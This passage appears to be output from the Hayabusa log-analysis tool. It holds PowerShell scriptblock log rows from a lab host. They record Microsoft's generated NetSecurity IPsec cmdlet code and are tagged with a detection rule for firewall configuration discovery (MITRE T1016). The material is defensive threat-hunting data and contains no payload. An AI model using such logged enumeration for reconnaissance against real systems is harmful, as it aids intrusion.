([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeCryptoSet' function Get-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedType",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.989 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"s.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeCryptoSet' function Set-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (c",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.989 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"dxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 